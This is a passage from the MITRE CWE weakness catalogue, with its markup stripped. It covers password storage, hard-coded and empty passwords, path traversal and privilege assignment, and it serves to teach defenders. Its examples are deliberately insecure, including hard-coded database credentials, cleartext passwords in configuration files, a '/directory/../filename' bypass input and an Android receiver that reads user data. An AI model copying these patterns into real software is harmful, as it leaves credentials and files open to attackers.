MITRE - 2017-11-08 - updated Applicable_Platforms, Causal_Nature, Likelihood_of_Exploit, Modes_of_Introduction, Relationships - - - CWE Content Team - MITRE - 2018-03-27 - updated Name, Relationships - - - CWE Content Team - MITRE - 2019-06-20 - updated Type - - - CWE Content Team - MITRE - 2020-02-24 - updated References, Relationships - - - CWE Content Team - MITRE - 2021-03-15 - updated Demonstrative_Examples - - - CWE Content Team - MITRE - 2021-07-20 - updated Description, Name, Relationships - - Plaintext Storage - Plaintext Storage of a Password - Plaintext Storage of a Password - Unprotected Storage of Credentials - - - - The storage of passwords in a recoverable format makes them subject to password reuse attacks by malicious users. In fact, it should be noted that recoverable encrypted passwords provide no significant benefit over plaintext passwords since they are subject not only to reuse by malicious attackers but also by malicious insiders. If a system administrator can recover a password directly, or use a brute force search on the available information, the administrator can use the password on other accounts. - - - - - - - Primary - - - - - - - - Architecture and Design - COMMISSION: This weakness refers to an incorrect design related to an architectural security tactic. - - - High - - - Confidentiality - Access Control - Gain Privileges or Assume Identity - User's passwords may be revealed. - - - Access Control - Gain Privileges or Assume Identity - Revealed passwords may be reused elsewhere to impersonate the users in question. - - - - - Architecture and Design - Use strong, non-reversible encryption to protect stored passwords. - - - - - Both of these examples verify a password by comparing it to a stored compressed version. - - int VerifyAdmin(char *password) {if (strcmp(compress(password), compressed_password)) {printf("Incorrect Password!\n");return(0);}printf("Entering Diagnostic Mode...\n");return(1);} - - - int VerifyAdmin(String password) {if (passwd.Equals(compress(password), compressed_password)) {return(0);} - //Diagnostic Mode - return(1);} - - Because a compression algorithm is used instead of a one way hashing algorithm, an attacker can recover compressed passwords stored in the database. - - - The following examples show a portion of properties and configuration files for Java and ASP.NET applications. The files include username and password information but they are stored in cleartext. - This Java example shows a properties file with a cleartext username / password pair. - - - - # Java Web App ResourceBundle properties file - ...webapp.ldap.username=secretUsernamewebapp.ldap.password=secretPassword... - - The following example shows a portion of a configuration file for an ASP.Net application. This configuration file includes username and password information for a connection to a database but the pair is stored in cleartext. - - ...<connectionStrings><add name="ud_DEV" connectionString="connectDB=uDB; uid=db2admin; pwd=password; dbalias=uDB;" providerName="System.Data.Odbc" /></connectionStrings>... - - Username and password information should not be included in a configuration file or a properties file in cleartext as this will allow anyone who can read the file access to the resource. If possible, encrypt this information. - - - - - Storing passwords in a recoverable format - - - SFP23 - Exposed Data - - - - - - - - - - The meaning of this entry needs to be investigated more closely, especially with respect to what is meant by "recoverable." - - - - CLASP - 2006-07-19 - - - CWE Content Team - MITRE - 2008-09-08 - updated Common_Consequences, Relationships, Other_Notes, Taxonomy_Mappings, Weakness_Ordinalities - - - CWE Content Team - MITRE - 2008-10-14 - updated Demonstrative_Examples, Description, Maintenance_Notes, Potential_Mitigations - - - CWE Content Team - MITRE - 2010-02-16 - updated Relationships - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences, Demonstrative_Examples - - - CWE Content Team - MITRE - 2012-05-11 - updated Demonstrative_Examples, Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Demonstrative_Examples - - - CWE Content Team - MITRE - 2014-06-23 - updated Description, Other_Notes - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms, Causal_Nature, Demonstrative_Examples, Likelihood_of_Exploit, Modes_of_Introduction, Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated References, Relationships - - - CWE Content Team - MITRE - 2021-03-15 - updated Demonstrative_Examples, Maintenance_Notes - - - - - Using an empty string as a password is insecure. - - - - - - - Primary - - - - - - - - Architecture and Design - - - Implementation - REALIZATION: This weakness is caused during implementation of an architectural security tactic. - - - Operation - - - High - - - Access Control - Gain Privileges or Assume Identity - - - - - System Configuration - Passwords should be at least eight characters long -- the longer the better. Avoid passwords that are in any way similar to other passwords you have. Avoid using words that may be found in a dictionary, names book, on a map, etc. Consider incorporating numbers and/or punctuation into your password. If you do use common words, consider replacing letters in that word with numbers and punctuation. However, do not use "similar-looking" punctuation. For example, it is not a good idea to change cat to c@t, ca+, (@+, or anything similar. Finally, it is never appropriate to use an empty string as a password. - - - - - The following examples show a portion of properties and configuration files for Java and ASP.NET applications. The files include username and password information but the password is provided as an empty string. - This Java example shows a properties file with an empty password string. - - - - # Java Web App ResourceBundle properties file - ...webapp.ldap.username=secretUsernamewebapp.ldap.password=... - - The following example shows a portion of a configuration file for an ASP.Net application. This configuration file includes username and password information for a connection to a database and the password is provided as an empty string. - - ...<connectionStrings><add name="ud_DEV" connectionString="connectDB=uDB; uid=db2admin; pwd=; dbalias=uDB;" providerName="System.Data.Odbc" /></connectionStrings>... - - An empty string should never be used as a password as this can allow unauthorized access to the application. Username and password information should not be included in a configuration file or a properties file in clear text. If possible, encrypt this information and avoid CWE-260 and CWE-13. - - - - - Password Management: Empty Password in Configuration File - - - - - - - - - 7 Pernicious Kingdoms - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Other_Notes, Taxonomy_Mappings, Weakness_Ordinalities - - - CWE Content Team - MITRE - 2009-10-29 - updated Other_Notes, Potential_Mitigations - - - CWE Content Team - MITRE - 2010-12-13 - updated Demonstrative_Examples - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated References, Relationships - - - CWE Content Team - MITRE - 2013-02-21 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms, Causal_Nature, Likelihood_of_Exploit, Modes_of_Introduction, Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated References, Relationships - - - - - The software contains a hard-coded password, which it uses for its own inbound authentication or for outbound communication to external components. - - A hard-coded password typically leads to a significant authentication failure that can be difficult for the system administrator to detect. Once detected, it can be difficult to fix, so the administrator may be forced into disabling the product entirely. There are two main variations: - - Inbound: the software contains an authentication mechanism that checks for a hard-coded password. - Outbound: the software connects to another system or component, and it contains hard-coded password for connecting to that component. - - In the Inbound variant, a default administration account is created, and a simple password is hard-coded into the product and associated with that account. This hard-coded password is the same for each installation of the product, and it usually cannot be changed or disabled by system administrators without manually modifying the program, or otherwise patching the software. If the password is ever discovered or published (a common occurrence on the Internet), then anybody with knowledge of this password can access the product. Finally, since all installations of the software will have the same password, even across different organizations, this enables massive attacks such as worms to take place. - The Outbound variant applies to front-end systems that authenticate with a back-end service. The back-end service may require a fixed password which can be easily discovered. The programmer may simply hard-code those back-end credentials into the front-end software. Any user of that program may be able to extract the password. Client-side systems with hard-coded passwords pose even more of a threat, since the extraction of a password from a binary is usually very simple. - - - - - - - - - - - Primary - - - - - - - - Implementation - REALIZATION: This weakness is caused during implementation of an architectural security tactic. - - - Architecture and Design - - - High - - - Access Control - Gain Privileges or Assume Identity - If hard-coded passwords are used, it is almost certain that malicious users will gain access through the account in question. - - - - - Manual Analysis - This weakness can be detected using tools and techniques that require manual (human) analysis, such as penetration testing, threat modeling, and interactive tools that allow the tester to record and modify an active session. - These may be more effective than strictly automated techniques. This is especially the case with weaknesses that are related to design and business rules. - - - Black Box - - Use monitoring tools that examine the software's process as it interacts with the operating system and the network. This technique is useful in cases when source code is unavailable, if the software was not developed by you, or if you want to verify that the build phase did not introduce any new weaknesses. Examples include debuggers that directly attach to the running process; system-call tracing utilities such as truss (Solaris) and strace (Linux); system activity monitors such as FileMon, RegMon, Process Monitor, and other Sysinternals utilities (Windows); and sniffers and protocol analyzers that monitor network traffic. - Attach the monitor to the process and perform a login. Using disassembled code, look at the associated instructions and see if any of them appear to be comparing the input to a fixed string or value. - - - - - - Architecture and Design - For outbound authentication: store passwords outside of the code in a strongly-protected, encrypted configuration file or database that is protected from access by all outsiders, including other local users on the same system. Properly protect the key (CWE-320). If you cannot use encryption to protect the file, then make sure that the permissions are as restrictive as possible. - - - Architecture and Design - For inbound authentication: Rather than hard-code a default username and password for first time logins, utilize a "first login" mode that requires the user to enter a unique strong password. - - - Architecture and Design - Perform access control checks and limit which entities can access the feature that requires the hard-coded password. For example, a feature might only be enabled through the system console instead of through a network connection. - - - Architecture and Design - - For inbound authentication: apply strong one-way hashes to your passwords and store those hashes in a configuration file or database with appropriate access control. That way, theft of the file/database still requires the attacker to try to crack the password. When receiving an incoming password during authentication, take the hash of the password and compare it to the hash that you have saved. - Use randomly assigned salts for each separate hash that you generate. This increases the amount of computation that an attacker needs to conduct a brute-force attack, possibly limiting the effectiveness of the rainbow table method. - - - - Architecture and Design - - For front-end to back-end connections: Three solutions are possible, although none are complete. - - The first suggestion involves the use of generated passwords which are changed automatically and must be entered at given time intervals by a system administrator. These passwords will be held in memory and only be valid for the time intervals. - Next, the passwords used should be limited at the back end to only performing actions valid for the front end, as opposed to having full access. - Finally, the messages sent should be tagged and checksummed with time sensitive values so as to prevent replay style attacks. - - - - - - - The following code uses a hard-coded password to connect to a database: - - ...DriverManager.getConnection(url, "scott", "tiger");... - - This is an example of an external hard-coded password on the client-side of a connection. This code will run successfully, but anyone who has access to it will have access to the password. Once the program has shipped, there is no going back from the database user "scott" with a password of "tiger" unless the program is patched. A devious employee with access to this information can use it to break into the system. Even worse, if attackers have access to the bytecode for application, they can use the javap -c command to access the disassembled code, which will contain the values of the passwords used. The result of this operation might look something like the following for the example above: - - javap -c ConnMngr.class22: ldc #36; //String jdbc:mysql://ixne.com/rxsql24: ldc #38; //String scott26: ldc #17; //String tiger - - - - - The following code is an example of an internal hard-coded password in the back-end: - - int VerifyAdmin(char *password) { - if (strcmp(password, "Mew!")) { - - printf("Incorrect Password!\n");return(0) - }printf("Entering Diagnostic Mode...\n");return(1); - } - - - int VerifyAdmin(String password) {if (!password.equals("Mew!")) {return(0)}//Diagnostic Modereturn(1);} - - Every instance of this program can be placed into diagnostic mode with the same password. Even worse is the fact that if this program is distributed as a binary-only distribution, it is very difficult to change that password or disable this "functionality." - - - The following examples show a portion of properties and configuration files for Java and ASP.NET applications. The files include username and password information but they are stored in cleartext. - This Java example shows a properties file with a cleartext username / password pair. - - - - # Java Web App ResourceBundle properties file - ...webapp.ldap.username=secretUsernamewebapp.ldap.password=secretPassword... - - The following example shows a portion of a configuration file for an ASP.Net application. This configuration file includes username and password information for a connection to a database but the pair is stored in cleartext. - - ...<connectionStrings><add name="ud_DEV" connectionString="connectDB=uDB; uid=db2admin; pwd=password; dbalias=uDB;" providerName="System.Data.Odbc" /></connectionStrings>... - - Username and password information should not be included in a configuration file or a properties file in cleartext as this will allow anyone who can read the file access to the resource. If possible, encrypt this information. - - - - - Password Management: Hard-Coded Password - - - Use of hard-coded password - - - A3 - Broken Authentication and Session Management - CWE More Specific - - - MSC03-J - Never hard code sensitive information - - - SFP33 - Hardcoded sensitive data - - - - - - - - This entry could be split into multiple variants: an inbound variant (as seen in the second demonstrative example) and an outbound variant (as seen in the first demonstrative example). These variants are likely to have different consequences, detectability, etc. More importantly, from a vulnerability theory perspective, they could be characterized as different behaviors. - - - - 7 Pernicious Kingdoms - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - KDM Analytics - 2008-08-01 - added/updated white box definitions - - - Veracode - 2008-08-15 - Suggested OWASP Top Ten 2004 mapping - - - CWE Content Team - MITRE - 2008-09-08 - updated Common_Consequences, Relationships, Other_Notes, Taxonomy_Mappings, Weakness_Ordinalities - - - CWE Content Team - MITRE - 2008-10-14 - updated Description, Potential_Mitigations - - - CWE Content Team - MITRE - 2008-11-13 - Significant description modifications to emphasize different variants. - - - CWE Content Team - MITRE - 2008-11-24 - updated Demonstrative_Examples, Description, Maintenance_Notes, Other_Notes, Potential_Mitigations - - - CWE Content Team - MITRE - 2009-01-12 - updated Demonstrative_Examples, Description, Maintenance_Notes, Potential_Mitigations, Relationships - - - CWE Content Team - MITRE - 2009-03-10 - updated Potential_Mitigations - - - KDM Analytics - 2009-07-17 - Improved the White_Box_Definition - - - CWE Content Team - MITRE - 2009-07-27 - updated Demonstrative_Examples, Related_Attack_Patterns, White_Box_Definitions - - - CWE Content Team - MITRE - 2010-02-16 - updated Demonstrative_Examples, Description, Detection_Factors, Name, Potential_Mitigations, Relationships - - - CWE Content Team - MITRE - 2010-04-05 - updated Applicable_Platforms - - - CWE Content Team - MITRE - 2010-06-21 - updated Detection_Factors, Potential_Mitigations - - - CWE Content Team - MITRE - 2010-09-27 - updated Relationships - - - CWE Content Team - MITRE - 2010-12-13 - updated Relationships - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences, Potential_Mitigations, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2012-05-11 - updated References, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2012-10-30 - updated Demonstrative_Examples - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2015-12-07 - updated Demonstrative_Examples - - - CWE Content Team - MITRE - 2017-01-19 - updated Related_Attack_Patterns - - - CWE Content Team - MITRE - 2017-05-03 - updated Related_Attack_Patterns - - - CWE Content Team - MITRE - 2017-11-08 - updated Causal_Nature, Demonstrative_Examples, Likelihood_of_Exploit, Modes_of_Introduction, Relationships, White_Box_Definitions - - - CWE Content Team - MITRE - 2019-01-03 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2019-06-20 - updated Related_Attack_Patterns - - - CWE Content Team - MITRE - 2020-02-24 - updated References, Relationships, Type - - - CWE Content Team - MITRE - 2020-08-20 - updated Relationships - - - CWE Content Team - MITRE - 2020-12-10 - updated Relationships - - - CWE Content Team - MITRE - 2021-03-15 - updated Demonstrative_Examples, Maintenance_Notes - - Hard-Coded Password - - - - The software uses external input to construct a pathname that should be within a restricted directory, but it does not properly neutralize "/dir/../filename" sequences that can resolve to a location that is outside of that directory. - - This allows attackers to traverse the file system to access files or directories that are outside of the restricted directory. - The '/dir/../filename' manipulation is useful for bypassing some path traversal protection schemes. Sometimes a program only checks for "../" at the beginning of the input, so a "/../" can bypass that check. - - - - - - - - - - - Implementation - - - - - Confidentiality - Integrity - Read Files or Directories - Modify Files or Directories - - - - - Implementation - Input Validation - - Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does. - When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as "red" or "blue." - Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code's environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright. - When validating filenames, use stringent allowlists that limit the character set to be used. If feasible, only allow a single "." character in the filename to avoid weaknesses such as CWE-23, and exclude directory separators such as "/" to avoid CWE-36. Use a list of allowable file extensions, which will help to avoid CWE-434. - Do not rely exclusively on a filtering mechanism that removes potentially dangerous characters. This is equivalent to a denylist, which may be incomplete (CWE-184). For example, filtering "/" is insufficient protection if the filesystem also supports the use of "\" as a directory separator. Another possible error could occur when the filtering is applied in a way that still produces dangerous data (CWE-182). For example, if "../" sequences are removed from the ".../...//" string in a sequential fashion, two instances of "../" would be removed from the original string, but the remaining characters would still form the "../" string. - - - - Implementation - Input Validation - Inputs should be decoded and canonicalized to the application's current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked. - - - - - '/directory/../filename - - - SFP16 - Path Traversal - - - - - PLOVER - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Potential_Mitigations, Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Applicable_Platforms, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2008-10-14 - updated Description - - - CWE Content Team - MITRE - 2009-07-27 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2010-06-21 - updated Description, Potential_Mitigations - - - CWE Content Team - MITRE - 2011-03-29 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms - - - CWE Content Team - MITRE - 2020-02-24 - updated Potential_Mitigations, Relationships - - - CWE Content Team - MITRE - 2020-06-25 - updated Potential_Mitigations - - Path Issue - Leading Directory Dot Dot Slash - '/directory/../filename' - - - - The software stores a password in a configuration file that might be accessible to actors who do not know the password. - This can result in compromise of the system for which the password is used. An attacker could gain access to this file and learn the stored password or worse yet, change the password to one of their choosing. - - - - - - - - - Architecture and Design - OMISSION: This weakness is caused by missing a security tactic during the architecture and design phase. - - - Implementation - - - - - Access Control - Gain Privileges or Assume Identity - - - - - Architecture and Design - Avoid storing passwords in easily accessible locations. - - - Architecture and Design - Consider storing cryptographic hashes of passwords as an alternative to storing in plaintext. - - - - - Below is a snippet from a Java properties file. - - webapp.ldap.username = secretUsernamewebapp.ldap.password = secretPassword - - Because the LDAP credentials are stored in plaintext, anyone with access to the file can gain access to the resource. - - - The following examples show a portion of properties and configuration files for Java and ASP.NET applications. The files include username and password information but they are stored in cleartext. - This Java example shows a properties file with a cleartext username / password pair. - - - - # Java Web App ResourceBundle properties file - ...webapp.ldap.username=secretUsernamewebapp.ldap.password=secretPassword... - - The following example shows a portion of a configuration file for an ASP.Net application. This configuration file includes username and password information for a connection to a database but the pair is stored in cleartext. - - ...<connectionStrings><add name="ud_DEV" connectionString="connectDB=uDB; uid=db2admin; pwd=password; dbalias=uDB;" providerName="System.Data.Odbc" /></connectionStrings>... - - Username and password information should not be included in a configuration file or a properties file in cleartext as this will allow anyone who can read the file access to the resource. If possible, encrypt this information. - - - - File or Directory - - - - Password Management: Password in Configuration File - - - - - - - - - 7 Pernicious Kingdoms - 2006-07-19 - - - Sean Eidemiller - Cigital - 2008-07-01 - added/updated demonstrative examples - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2008-10-14 - updated Description - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated References, Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Demonstrative_Examples, Potential_Mitigations - - - CWE Content Team - MITRE - 2014-07-30 - updated Demonstrative_Examples, Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Affected_Resources, Applicable_Platforms, Modes_of_Introduction, Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated References, Relationships, Type - - - CWE Content Team - MITRE - 2020-08-20 - updated Relationships - - - CWE Content Team - MITRE - 2021-03-15 - updated Demonstrative_Examples - - - - - Obscuring a password with a trivial encoding does not protect the password. - Password management issues occur when a password is stored in plaintext in an application's properties or configuration file. A programmer can attempt to remedy the password management problem by obscuring the password with an encoding function, such as base 64 encoding, but this effort does not adequately protect the password. - - - - - - - - - - Architecture and Design - COMMISSION: This weakness refers to an incorrect design related to an architectural security tactic. - - - - - Access Control - Gain Privileges or Assume Identity - - - - - Passwords should be encrypted with keys that are at least 128 bits in length for adequate security. - - - - - The following code reads a password from a properties file and uses the password to connect to a database. - - ...Properties prop = new Properties();prop.load(new FileInputStream("config.properties"));String password = Base64.decode(prop.getProperty("password"));DriverManager.getConnection(url, usr, password);... - - This code will run successfully, but anyone with access to config.properties can read the value of password and easily determine that the value has been base 64 encoded. If a devious employee has access to this information, they can use it to break into the system. - - - The following code reads a password from the registry and uses the password to create a new network credential. - - ...string value = regKey.GetValue(passKey).ToString();byte[] decVal = Convert.FromBase64String(value);NetworkCredential netCred = newNetworkCredential(username,decVal.toString(),domain);... - - This code will run successfully, but anyone who has access to the registry key used to store the password can read the value of password. If a devious employee has access to this information, they can use it to break into the system. - - - - - Password Management: Weak Cryptography - - - A8 - Insecure Storage - CWE More Specific - - - - - - - - - - - - - The "crypt" family of functions uses weak cryptographic algorithms and should be avoided. It may be present in some projects for compatibility. - - - - - 7 Pernicious Kingdoms - 2006-07-19 - - - Veracode - 2008-08-15 - Suggested OWASP Top Ten 2004 mapping - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Other_Notes, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2009-07-27 - updated Demonstrative_Examples - - - CWE Content Team - MITRE - 2011-03-29 - updated Relationships - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated References, Relationships - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships - - - CWE Content Team - MITRE - 2015-12-07 - updated Demonstrative_Examples - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms, Modes_of_Introduction, Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated Description, Name, Other_Notes, References, Relationships, Type - - Weak Cryptography for Passwords - - - - If no mechanism is in place for managing password aging, users will have no incentive to update passwords in a timely manner. - Security experts have often recommended that users change their passwords regularly and avoid reusing passwords. Although this can be an effective mitigation, if the expiration window is too short, it can cause users to generate poor or predictable passwords. As such, it is important to discourage creating similar passwords. It is also useful to have a password aging mechanism that notifies users when passwords are considered old and requests that they replace them with new, strong passwords. Companion documentation which stresses how important this practice is can help users understand and better support this approach. - - - - - - - - - - - - - Architecture and Design - COMMISSION: This weakness refers to an incorrect design related to an architectural security tactic. - - - Low - - - Access Control - Gain Privileges or Assume Identity - As passwords age, the probability that they are compromised grows. - - - - - Architecture and Design - As part of a product's design, require users to change their passwords regularly and avoid reusing previous passwords. - - - - - A system does not enforce the changing of passwords every certain period. - - - - - Not allowing password aging - - - - - - - - - - - - - - - - - - - - - - - CLASP - 2006-07-19 - - - CWE Content Team - MITRE - 2008-09-08 - updated Common_Consequences, Relationships, Other_Notes, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2011-03-29 - updated Relationships - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2011-06-27 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated References, Relationships - - - CWE Content Team - MITRE - 2014-06-23 - updated Other_Notes, Potential_Mitigations - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms, Likelihood_of_Exploit, Modes_of_Introduction, Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated Demonstrative_Examples, Description, Potential_Mitigations, References, Type - - - CWE Content Team - MITRE - 2020-08-20 - updated Related_Attack_Patterns - - Not Allowing Password Aging - - - - Allowing password aging to occur unchecked can result in the possibility of diminished password integrity. - Just as neglecting to include functionality for the management of password aging is dangerous, so is allowing password aging to continue unchecked. Passwords must be given a maximum life span, after which a user is required to update with a new and different password. - - - - - - - - - - Architecture and Design - COMMISSION: This weakness refers to an incorrect design related to an architectural security tactic. - - - Low - - - Access Control - Gain Privileges or Assume Identity - As passwords age, the probability that they are compromised grows. - - - - - Architecture and Design - Ensure that password aging is limited so that there is a defined maximum age for passwords and so that the user is notified several times leading up to the password expiration. - - - - - A system requires the changing of passwords every five years. - - - - - Allowing password aging - - - - - - - - - - - - - - - - - - - - - - - CLASP - 2006-07-19 - - - CWE Content Team - MITRE - 2008-09-08 - updated Common_Consequences, Relationships, Other_Notes, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2011-03-29 - updated Description, Other_Notes, Relationships - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2011-06-27 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated References, Relationships - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms, Likelihood_of_Exploit, Modes_of_Introduction, Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated Demonstrative_Examples, References - - - CWE Content Team - MITRE - 2020-08-20 - updated Related_Attack_Patterns - - Allowing Unchecked Password Aging - - - - A product incorrectly assigns a privilege to a particular actor, creating an unintended sphere of control for that actor. - - - - - - - Resultant - - - - - - - - Architecture and Design - - - Implementation - REALIZATION: This weakness is caused during implementation of an architectural security tactic. - - - - - Access Control - Gain Privileges or Assume Identity - A user can access restricted functionality and/or sensitive information that may include administrative functionality and user accounts. - - - - - Architecture and Design - Operation - Very carefully manage the setting, management, and handling of privileges. Explicitly manage trust zones in the software. - - - Architecture and Design - Operation - Environment Hardening - Run your code using the lowest privileges that are required to accomplish the necessary tasks [REF-76]. If possible, create isolated accounts with limited privileges that are only used for a single task. That way, a successful attack will not immediately give the attacker access to the rest of the software or its environment. For example, database applications rarely need to run as the database administrator, especially in day-to-day operations. - - - - - The following example demonstrates the weakness. - - seteuid(0); - /* do some stuff */ - - seteuid(getuid()); - - - - The following example demonstrates the weakness. - - AccessController.doPrivileged(new PrivilegedAction() { - public Object run() { - // privileged code goes here, for example: - System.loadLibrary("awt");return null; - // nothing to return - - } - - - - - - This application sends a special intent with a flag that allows the receiving application to read a data file for backup purposes. - - Intent intent = new Intent();intent.setAction("com.example.BackupUserData");intent.setData(file_uri);intent.addFlags(FLAG_GRANT_READ_URI_PERMISSION);sendBroadcast(intent); - - - public class CallReceiver extends BroadcastReceiver {@Overridepublic void onReceive(Context context, Intent intent) {Uri userData = intent.getData();stealUserData(userData);}} - - Any malicious application can register to receive this intent. Because of the FLAG_GRANT_READ_URI_PERMISSION included with the intent, the malicious receiver code can read the user's data. - - - - - CVE-1999-1193 - untrusted user placed in unix "wheel" group - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-1193 - - - CVE-2005-2741 - Product allows users to grant themselves certain rights that can be used to escalate privileges. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2741 - - - CVE-2005-2496 - Product uses group ID of a user instead of the group, causing it to run with different privileges. This is resultant from some other unknown issue. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2496 - - - CVE-2004-0274 - Product mistakenly assigns a particular status to an entity, leading to increased privileges. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0274 - - - - System Process - - - - Incorrect Privilege Assignment - - - SEC00-J - Do not allow privileged blocks to leak sensitive information across a trust boundary - - - SEC01-J - Do not allow tainted variables in privileged blocks - - - - - - - - PLOVER - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Description, Relationships, Taxonomy_Mappings, Weakness_Ordinalities - - - CWE Content Team - MITRE - 2009-03-10 - updated Relationships - - - CWE Content Team - MITRE - 2009-12-28 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2010-06-21 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2012-05-11 - updated Common_Consequences, Demonstrative_Examples, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations, References - - - CWE Content Team - MITRE - 2014-02-18 - updated Applicable_Platforms, Demonstrative_Examples - - - CWE Content Team - MITRE - 2017-11-08 - updated Causal_Nature, Modes_of_Introduction, References, Relationships - - - CWE Content Team - MITRE - 2019-01-03 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - - CWE Content Team - MITRE - 2021-03-15 - updated Demonstrative_Examples - - - - - A particular privilege, role, capability, or right can be used to perform unsafe actions that were not intended, even when it is assigned to the correct entity. - - - - - - - - - Architecture and Design - - - Implementation - REALIZATION: This weakness is caused during implementation of an architectural security tactic. - - - Operation - - - - - Access Control - Gain Privileges or Assume Identity - A user can access restricted functionality and/or sensitive information that may include administrative functionality and user accounts. - - - - - Architecture and Design - Operation - Very carefully manage the setting, management, and handling of privileges. Explicitly manage trust zones in the software. - - - Architecture and Design - Operation - Environment Hardening - Run your code using the lowest privileges that are required to accomplish the necessary tasks [REF-76]. If possible, create isolated accounts with limited privileges that are only used for a single task. That way, a successful attack will not immediately give the attacker access to the rest of the software or its environment. For example, database applications rarely need to run as the database administrator, especially in day-to-day operations. - - - - - This code intends to allow only Administrators to print debug information about a system. - - public enum Roles {ADMIN,USER,GUEST} - public void printDebugInfo(User requestingUser){ - if(isAuthenticated(requestingUser)){ - switch(requestingUser.role){ - case GUEST:System.out.println("You are not authorized to perform this command");break; - default:System.out.println(currentDebugState());break; - - } - }else{System.out.println("You must be logged in to perform this command");} - } - - While the intention was to only allow Administrators to print the debug information, the code as written only excludes those with the role of "GUEST". Someone with the role of "ADMIN" or "USER" will be allowed access, which goes against the original intent. An attacker may be able to use this debug information to craft an attack on the system. - - - - - CVE-2002-1981 - Roles have access to dangerous procedures (Accessible entities). - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1981 - - - CVE-2002-1671 - Untrusted object/method gets access to clipboard (Accessible entities). - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1671 - - - CVE-2004-2204 - Gain privileges using functions/tags that should be restricted (Accessible entities). - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2204 - - - CVE-2000-0315 - Traceroute program allows unprivileged users to modify source address of packet (Accessible entities). - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0315 - - - CVE-2004-0380 - 